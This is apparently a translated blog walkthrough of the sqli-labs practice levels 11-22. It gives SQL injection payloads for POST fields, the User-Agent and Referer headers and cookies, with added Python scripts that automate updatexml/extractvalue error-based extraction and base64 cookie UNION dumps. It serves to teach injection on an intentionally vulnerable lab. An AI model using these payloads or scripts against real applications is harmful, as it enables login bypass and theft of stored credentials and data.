Original article: http://blog.csdn.net/u012763794/article/details/51361152

The previous post covered the basic challenges Less 1-10 (http://blog.csdn.net/u012763794/article/details/51207833), which are all GET-type injections of several kinds. This post covers Less 11-22: POST-type injection, including injection through the User-Agent, Referer and Cookie headers. POST injection is mostly used for login bypass, but the same blind and error-based techniques extract data just as well.
Tools
Firefox + the HackBar plugin.
First find the field names the login form submits by POST: uname and passwd (right-click the username input box and choose Inspect Element to see them).
Less 11 POST - Error Based - Single quotes - String (POST single-quote string injection, error based)

Detection: as in the previous article, entering a single quote by itself produces a MySQL error.
Copy the quoted fragment from the error message and strip the single quote at each end; what remains is the tail of the query that follows our input, so the query has the form

    SELECT username, password FROM users WHERE username='test' and password='test' LIMIT 0,1

Compare this with the GET-based error from the previous article: there the fragment after our quote was only the closing quote and LIMIT 0,1, whereas here the fragment after test' still contains and password='test' LIMIT 0,1, which tells us that a second quoted field (the password) follows the username in the same query.

So this is single-quote string injection.

The quickest bypass is a comment: close the string with a quote and comment out the rest of the query, e.g. uname = admin'# (or uname = a' or 1=1#), and the login succeeds.

Besides the comment, you can also close the quote with a matching string, e.g. uname = test' or '1'='1 with any password. This fails, and it is worth seeing why. The final SQL is

    SELECT username, password FROM users WHERE username='test' or '1'='1' and password='test' LIMIT 0,1

AND binds more tightly than OR, so '1'='1' and password='test' is evaluated first. The users table has no row whose password is test, so the AND is false, and the statement is effectively

    SELECT username, password FROM users WHERE username='test' or false

There is no user test either, so the left side is false as well, and the OR cannot save us: no row comes back and the login fails. (The original post shows this with three screenshots: the users table, the AND part evaluating to 0, and the whole WHERE clause evaluating to 0.)

So put the payload in passwd instead: uname = test, passwd = test' or '1'='1. Now the query is

    SELECT username, password FROM users WHERE username='test' and password='test' or '1'='1' LIMIT 0,1

Again AND first: username='test' and password='test' is false (0); '1'='1' is always true (1); the WHERE clause reduces to

    SELECT username, password FROM users WHERE 0 or 1;

which matches every row, so the login is bypassed.

To sum up: for the first login field (usually the username) use a comment to cut off the rest of the query; for the second field (usually the password) both closing the quote and commenting work.
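The precedence argument above can be checked against a real SQL engine instead of screenshots. The following is an added example and not code from the original post: it builds the Less 11 query by string concatenation exactly as the vulnerable PHP does, runs it against a constructed users table (sample rows modelled on the sqli-labs defaults), and shows why the same payload fails in uname but works in passwd. SQLite stands in for MySQL because both give AND higher precedence than OR; since SQLite has no MySQL-style `#` comment, the comment bypass uses `-- ` (with the trailing space), which MySQL accepts as well.

```python
"""Added example, not from the original post: Less 11 precedence, run for real."""
import sqlite3

# Constructed sample rows: there is no user "test" and no password "test".
USERS = [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you"), (8, "admin", "admin")]


def run_login(uname, passwd):
    """Build the query the way the vulnerable page does (concatenation, no
    escaping), run it, and return (sql, first_row_or_None)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", USERS)
    sql = ("SELECT username, password FROM users WHERE username='" + uname
           + "' and password='" + passwd + "' LIMIT 0,1")
    row = conn.execute(sql).fetchone()
    conn.close()
    return sql, row


def explain(uname, passwd):
    """One attempt, with the resulting query and the verdict."""
    sql, row = run_login(uname, passwd)
    verdict = "login OK as %r" % row[0] if row else "login FAILED"
    return "%s\n  -> %s" % (sql, verdict)


if __name__ == "__main__":
    # 1. or '1'='1 in the USERNAME: AND binds first, so the clause is
    #    username='test' or ('1'='1' and password='test')  ->  false or false
    print(explain("test' or '1'='1", "test"))
    # 2. the same payload in the PASSWORD:
    #    (username='test' and password='test') or '1'='1'  ->  false or true,
    #    every row matches and LIMIT 0,1 hands back the first one
    print(explain("test", "test' or '1'='1"))
    # 3. comment in the username: everything after -- is discarded,
    #    including the password check and the LIMIT
    print(explain("admin'-- ", "whatever"))
```

Swap the sample rows for your own and the verdicts follow the same rule: whatever sits on the right of an OR is only ANDed with what follows it, so an always-true term has to be the last thing in the WHERE clause to win.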
Besides bypassing the login, database contents can also be extracted here by blind injection, one request per yes/no question.
That is tedious by hand; the Python script from the earlier post can be adapted to it if you have time, otherwise skip it here.
Less 12 POST - Error Based - Double quotes - String - with twist (POST double-quote string injection with a twist, error based)

A double quote produces the error while a single quote does not, so look at the error message for what else surrounds the value: here the string is wrapped in ("..."), so close both, passwd = a") or 1=1#, and the login is bypassed directly.
Less 13 POST - Double Injection - Single quotes - String - twist (POST single-quote string injection with a twist, double-query error based)

The error message shows the value is wrapped in ('...'), so close both and make the condition always true: passwd = a') or 1=1#. Nothing from the query is printed on this level, which is why the title says Double Injection: data has to be extracted through the double-query (rand/floor/group by) error technique.
Less 14 POST - Double Injection - Single quotes - String - twist (POST single-quote string injection with a twist, double-query error based)

Same title as the previous level, but here a single quote gives no error while a double quote does, and there are no parentheses: passwd = a" or 1=1#. This is simpler than the two levels above.
Less 15 POST - Blind - Boolean/Time Based - Single quotes (POST blind injection, boolean or time based, single quote)

Neither a single nor a double quote produces a visible error here. To identify the quoting we have to watch behaviour instead: append an always-true or always-false condition (a' or 1=1# versus a' and 1=2#) and compare the two responses, or use a time delay (a' and sleep(5)#). Once the single quote is confirmed this is ordinary blind injection, and it is best scripted rather than done by hand.
Less 16 POST - Blind - Boolean/Time Based - Double quotes (POST blind injection, boolean or time based, double quote)

Use the time delay this time. uname=a&passwd=a") or 1=1# logs in, which shows the value is wrapped in ("...").
Test the length of the database name:
    uname=a&passwd=a") or if(length(database())=7,1,sleep(5))#
    uname=a&passwd=a") or if(length(database())=8,1,sleep(5))#
With if(cond,1,sleep(5)) the response is delayed when the condition is false, so the first request sleeps and the second returns at once: the name is 8 characters long. Note that the sleep sits in the WHERE clause and can run once for every row the query examines, so the total delay may be a multiple of 5 seconds; keep the delay short when a table has many rows.
Less 17 POST - Update Query - Error Based - String (POST error-based injection in an UPDATE query)

Warning: the injection below runs inside an UPDATE statement; a careless payload can overwrite the password column of the users table for every user, so practise on a copy of the database.

The error-based technique used here is the XPath one, through the MySQL function updatexml. (For XPath itself see http://www.w3school.com.cn/xpath/.) Tutorials usually hand you a payload of the form updatexml(1, concat(... version() ...), 0) without saying what the function does or what each parameter means, so it is worth trying the function on the mysql console, where the examples in the official manual make it clear.

updatexml(xml_target, xpath_expr, new_xml) takes three parameters: the first is the target XML document, the second an XPath expression, and the third the XML fragment that replaces the part of the target matched by the XPath expression. Working through the manual's examples: the first replaces node a itself (the whole element, not just its content) with the new fragment; the second changes nothing, because the document has no b node directly under the root (/ works like the Linux root directory); the third, with //b, matches b at any depth and replaces it. Also note that updatexml replaces only a single matched node; with several matches it returns the document unchanged.
Now the injection. This level is different from the previous ones, so look at the code first.

There is a filter function, check_input. It first checks that the value is not empty and truncates it to its first 15 characters. Next it looks at magic_quotes_gpc: get_magic_quotes_gpc() returns 1 when the setting is on and 0 when it is off. magic_quotes_gpc is the PHP setting that automatically prefixes quotes and backslashes in GET, POST and cookie data with "\" so that unescaped input cannot break the program, in particular the database statement; if it is on, stripslashes removes those backslashes again so the value can be escaped properly below. ctype_digit() returns true if the value consists only of digits, otherwise false. A non-numeric value is wrapped in single quotes and passed through mysql_real_escape_string, which escapes the characters that are special in SQL strings and takes the connection's current character set into account, so the wide-byte trick is cut off as well. A purely numeric value is converted with intval, because the numeric fields are passed as integers.

    function check_input($value)
    {
        if (!empty($value)) {
            // truncation (see comments)
            $value = substr($value, 0, 15);
        }
        // Stripslashes if magic quotes enabled
        if (get_magic_quotes_gpc()) {
            $value = stripslashes($value);
        }
        // Quote if not a number
        if (!ctype_digit($value)) {
            $value = "'" . mysql_real_escape_string($value) . "'";
        } else {
            $value = intval($value);
        }
        return $value;
    }

Only uname goes through check_input; passwd is used unfiltered, so that is where we inject.
The level first looks up the user by username and, if the user exists, updates that user's password. So the username must be a real one; we can only guess (admin, root, test and so on) or use a wordlist. admin exists, so admin is used from here on.

Now the payload in the password field. The first and third parameters of updatexml can be any number, and the 1= prefix some tutorials put in front is not needed either: all we want is for updatexml to raise an error while the UPDATE executes.

The key is understanding the second parameter, the XPath expression. With version() used directly the error message shows the version incomplete: the XPath parser accepts the leading characters and reports the error from the point where it fails, so the first character is lost. Put a character that cannot start an XPath expression on both sides of the value with concat(), for example parentheses (0x28 and 0x29) or + (0x2b), and the error message shows the whole value. One such character at the front is enough, and it can be concatenated directly in front of the value. Many other characters work too; experiment rather than rely on a list. The rule is: when the XPath parse fails, only the part of the expression from the failure onwards is printed, so a bad first character makes the whole value appear.

Now the real injection.
Current database: database(). Current user: user().
Tables: select table_name from information_schema.tables where table_schema=database() limit N,1, stepping N to walk through the tables. The subquery must return exactly one row; with several rows the value does not appear in the error. Since single quotes are not filtered in passwd, table_schema='security' can be written directly instead of database().
Columns of users: select column_name from information_schema.columns where table_name='users', again with limit, giving id, username and password.
Data: selecting from users inside an UPDATE of users fails with the error that you cannot specify the target table for update in the FROM clause. Wrapping it in another select is not enough by itself; the inner select has to become a derived table with an alias, e.g. (select password from (select password from users where username='admin') as a), with the alias added after the whole inner select. Then the data comes out like everything else.
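Two details of this level are easy to get wrong when scripting it: MySQL prints at most 32 characters of an XPATH syntax error, so longer values have to be fetched in substr() chunks with the marker character at the front of every chunk, and a payload that comments out the rest of the UPDATE touches every row if updatexml ever fails to raise. The following is an added example, not code from the original post, that builds the payloads (including the derived-table alias for reading users) and parses the leaked value out of the error text; it also covers the two-argument extractvalue form used in Less 19 below. It assumes, from the sqli-labs source rather than from this post, that the level runs UPDATE users SET password='$passwd' WHERE username='$uname' with passwd unescaped and echoes mysql_error(); the payload closes with or ' instead of # so the original WHERE survives. FakeServer is a constructed stand-in with made-up sqli-labs-style answers so the script runs offline; against a live target replace FakeServer.send with a function that POSTs uname=admin&passwd=<payload> and returns the response body.

```python
"""Added example, not from the original post: chunked updatexml/extractvalue extraction."""
import re

ERROR_LIMIT = 32         # MySQL shows at most 32 characters of an XPATH syntax error
CHUNK = ERROR_LIMIT - 1  # one of them is used by the ~ marker


def updatexml_payload(expr, offset=1):
    """passwd value for Less 17.  expr is any SQL expression (function call or
    subquery).  The 1st and 3rd updatexml arguments do not matter.  Closing
    with  or '  instead of  #  keeps the original WHERE username=... intact, so
    even if updatexml somehow does not error only the guessed user's row is
    touched, not the whole table (the warning at the top of this level)."""
    return "a' or updatexml(1,concat(0x7e,substr((%s),%d,%d)),1) or '" % (expr, offset, CHUNK)


def extractvalue_payload(expr, offset=1):
    """Less 19 variant: extractvalue takes two arguments; same marker, same limit."""
    return "a' or extractvalue(1,concat(0x7e,substr((%s),%d,%d))) or '" % (expr, offset, CHUNK)


def same_table_subquery(outer, columns, table):
    """Reading the table being UPDATEd must go through a derived table with an
    alias; a bare subquery gets "You can't specify target table 'users' for
    update in FROM clause"."""
    return "select %s from (select %s from %s) as t" % (outer, columns, table)


ERROR_RE = re.compile(r"XPATH syntax error: '~([^']*)'")


def parse_leak(body):
    """Value carried by the error message, or None when no XPath error appeared."""
    m = ERROR_RE.search(body)
    return m.group(1) if m else None


def dump(send, expr, build=updatexml_payload):
    """Whole value of expr, CHUNK characters per request."""
    out, offset = "", 1
    while True:
        chunk = parse_leak(send(build(expr, offset)))
        if chunk is None:
            raise RuntimeError("no XPATH error for %r: NULL result, wrong payload, "
                               "or the UPDATE went through" % expr)
        out += chunk
        if len(chunk) < CHUNK:
            return out
        offset += CHUNK


class FakeServer:
    """Constructed stand-in for the Less 17 page.  ANSWERS is made-up
    sqli-labs-style data: what MySQL would return for each expression."""

    ANSWERS = {
        "database()": "security",
        "user()": "root@localhost",
        "select group_concat(table_name) from information_schema.tables "
        "where table_schema='security'": "emails,referers,uagents,users",
        "select group_concat(column_name) from information_schema.columns "
        "where table_name='users'": "id,username,password",
        same_table_subquery("group_concat(username,0x3a,password)", "username,password", "users"):
            "Dumb:Dumb,Angelina:I-kill-you,Dummy:p@ssword,secure:crappy,stupid:stupidity",
    }
    PAYLOAD_RE = re.compile(r"substr\(\((.*)\),(\d+),(\d+)\)\)+(?:,1)?\) or '$")

    def __init__(self):
        self.requests = 0

    def send(self, passwd):
        """Emulate UPDATE users SET password='<passwd>' ...: evaluate the injected
        XPath function and return the page body, truncated as MySQL does."""
        self.requests += 1
        m = self.PAYLOAD_RE.search(passwd)
        value = self.ANSWERS.get(m.group(1)) if m else None
        if value is None:  # unknown expression or NULL: no XPath error, the UPDATE runs
            return "<html>password updated</html>"
        start, length = int(m.group(2)) - 1, int(m.group(3))
        xpath = "~" + value[start:start + length]
        return "Issue with your mysql: XPATH syntax error: '%s'" % xpath[:ERROR_LIMIT]


if __name__ == "__main__":
    srv = FakeServer()
    for expr in FakeServer.ANSWERS:
        print("%-45.45s -> %s" % (expr, dump(srv.send, expr)))
    print("requests:", srv.requests)
```

dump() stops when a chunk comes back shorter than 31 characters; a NULL result (for example a limit offset past the last table) produces no XPath error at all, which the script reports instead of silently returning an empty string.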
Less 18 POST - Header Injection - User-Agent field - Error based (POST error-based injection through the User-Agent header)

Here both the username and the password are filtered.

How do we know the User-Agent is injectable? The page displays our IP address, so one can guess it also stores the User-Agent, but we never rely on the visible text: the header has to be fuzzed, that is, put a single quote and other characters into it and watch what comes back. (A page that tells you to visit with browser xxx to obtain a User-Agent may only be checking it in front-end JavaScript.)

Which tool? Burp's Repeater is the most convenient; Firefox add-ons such as Live HTTP Headers and Tamper Data also work. Live HTTP Headers is used below.

You must enter a correct username and password first, so that the credential check passes and the code path that handles the User-Agent is reached; this level would fit a register-then-login flow better. With valid credentials the page echoes our User-Agent.

Get the database name as in the previous level, with updatexml inside the header.
This time dump the emails table instead of users, stepping the limit offset to get all rows.
Less 19 POST - Header Injection - Referer field - Error based (POST error-based injection through the Referer header)

updatexml works here too, but let's use the other XPath error function, extractvalue.
See the MySQL manual for the details: the first parameter is again an XML document and the second an XPath expression; the function returns the value of the node(s) the expression matches. Going through the examples, the difference from updatexml, which updates only one node at a time, is that extractvalue can return the values of several nodes at once, separated by spaces.
Now the injection (extractvalue takes two parameters, updatexml three); the idea is the same as before.
The final result is the same as on the previous level.
Less 20 POST - Cookie injection - User-Agent field - Error based (POST error-based injection through the Cookie header)

Read the code below. First the page checks whether the uname cookie is set. If not, it runs the login query and sets the cookie. If the cookie exists there are two cases. In the first, the delete-cookie button was not pressed (a logged-in visit with a still-valid cookie): the page prints the User-Agent, the IP address, the cookie and its expiry, runs SELECT * FROM users WHERE username='$cookee' LIMIT 0,1 with the cookie value unescaped, and shows the username, password and id together with the delete-cookie button.
    if (!isset($_POST['submit'])) {
        $cookee = $_COOKIE['uname'];
        $format = 'D d M Y - H:i:s';
        $timestamp = time() + 3600;
        // (the HTML markup around this output was lost in extraction; only the text is kept)
        echo "YOUR USER AGENT IS : " . $_SERVER['HTTP_USER_AGENT'];
        echo "YOUR IP ADDRESS IS : " . $_SERVER['REMOTE_ADDR'];
        echo "DELETE YOUR COOKIE OR WAIT FOR IT TO EXPIRE";
        echo "YOUR COOKIE : uname = $cookee and expires: " . date($format, $timestamp);
        // the cookie value goes into the query unescaped
        $sql = "SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";
        $result = mysql_query($sql);
        if (!$result) {
            die('Issue with your mysql: ' . mysql_error());
        }
        $row = mysql_fetch_array($result);
        if ($row) {
            echo 'Your Login name:' . $row['username'];
            echo 'Your Password:' . $row['password'];
            echo 'Your ID:' . $row['id'];
        } else {
            // (HTML-only output, lost in extraction)
        }
    }
In the second case the delete-cookie button was pressed: the backend sets the cookie's expiry to a time that has already passed, so the browser discards it.

The core is the query above: the cookie value is concatenated straight into the SQL, so the method is exactly as on the previous levels, except that the payload goes into the uname cookie instead of a form field.
First the column count: a union with three columns (' union select 1,2,3#) returns correctly, so the users table has three columns.
Then read the emails table through the union, using limit offsets, to get the last email directly.
Less 21 Cookie Injection - Error Based - complex - string (error-based cookie injection, complex string)

The cookie value is base64 encoded and the query wraps it in single quotes plus parentheses; otherwise this is the same as Less 20: build the payload for the ('...') context, base64-encode it and put it in the cookie.

Less 22 Cookie Injection - Error Based - Double Quotes - string (error-based cookie injection, double-quoted string)

Same as Less 20 and 21 again, this time with double quotes and base64 encoding. With HackBar's encoding functions that is no trouble at all.
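The cookie levels differ only in how the cookie is decoded and quoted before it reaches the query quoted above. The following is an added example, not code from the original post, that reproduces the server side of Less 20 and 21 from that PHP and drives it from the attacker side: it crafts the cookie (raw, or base64 as Less 21/22 require), finds the column count by growing the UNION until the engine stops complaining, and pulls the emails table out through column 2 in one request. It assumes the query from the quoted code, SELECT * FROM users WHERE username='$cookee' LIMIT 0,1, and, from the sqli-labs source rather than this post, that Less 21 wraps the decoded cookie as ('...'); Less 22's "..." context is parsed differently by SQLite than by MySQL, so only the cookie encoding is shown for it. The users and emails rows are constructed sample data; SQLite has no `#` comment, so `-- ` (which MySQL also accepts) is used.

```python
"""Added example, not from the original post: cookie injection for Less 20/21, end to end."""
import base64
import sqlite3

# Constructed sample rows in the style of the sqli-labs tables.
USERS = [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you"), (8, "admin", "admin")]
EMAILS = [(1, "Dumb@dhakkan.com"), (2, "Angel@iloveu.com"), (3, "admin@dhakkan.com")]

# how each level embeds the decoded cookie in the query (Less 21 shape assumed from sqli-labs)
CONTEXTS = {
    "less20": "SELECT * FROM users WHERE username='%s' LIMIT 0,1",
    "less21": "SELECT * FROM users WHERE username=('%s') LIMIT 0,1",
}
# what closes the string on each level before our own SQL starts
PREFIX = {"less20": "nobody'", "less21": "nobody')"}


def craft_cookie(payload, level):
    """Cookie value for the level: raw for Less 20, base64 for Less 21/22.
    PHP URL-decodes $_COOKIE, so percent-encode '+' and '=' in the base64
    output when sending it by hand (HackBar does this for you)."""
    if level == "less20":
        return payload
    return base64.b64encode(payload.encode()).decode()


def server(cookie, level):
    """The vulnerable page: decode the cookie as the level does, run the
    unescaped query, return (sql, first_row_or_None, error_or_None)."""
    value = cookie if level == "less20" else base64.b64decode(cookie).decode()
    sql = CONTEXTS[level] % value
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.execute("CREATE TABLE emails (id INTEGER, email_id TEXT)")
    conn.executemany("INSERT INTO users VALUES (?,?,?)", USERS)
    conn.executemany("INSERT INTO emails VALUES (?,?)", EMAILS)
    try:
        return sql, conn.execute(sql).fetchone(), None
    except sqlite3.OperationalError as e:
        return sql, None, str(e)
    finally:
        conn.close()


def find_column_count(level, max_cols=8):
    """Grow `union select 1,2,...` until the engine stops rejecting the
    mismatched column count; that number is the width of users."""
    for n in range(1, max_cols + 1):
        cols = ",".join(str(i) for i in range(1, n + 1))
        payload = PREFIX[level] + " union select " + cols + "-- "
        _, row, err = server(craft_cookie(payload, level), level)
        if err is None and row is not None:
            return n
    return None


def dump_emails(level):
    """Every email in one request: the username in the prefix does not
    exist, so the UNION row is the one the page prints, column 2 included."""
    payload = PREFIX[level] + " union select 1,(select group_concat(email_id) from emails),3-- "
    _, row, err = server(craft_cookie(payload, level), level)
    if err:
        raise RuntimeError(err)
    return row[1]


if __name__ == "__main__":
    for level in ("less20", "less21"):
        print(level, "columns:", find_column_count(level))
        print(level, "emails :", dump_emails(level))
    print("less22 cookie for  nobody\" or 1=1#  :", craft_cookie('nobody" or 1=1#', "less22"))
```

The error returned for the wrong column count is the signal here, which is why the page's die('Issue with your mysql: ...') matters: on a level that swallowed errors you would fall back to the boolean or time-based approach from Less 15/16.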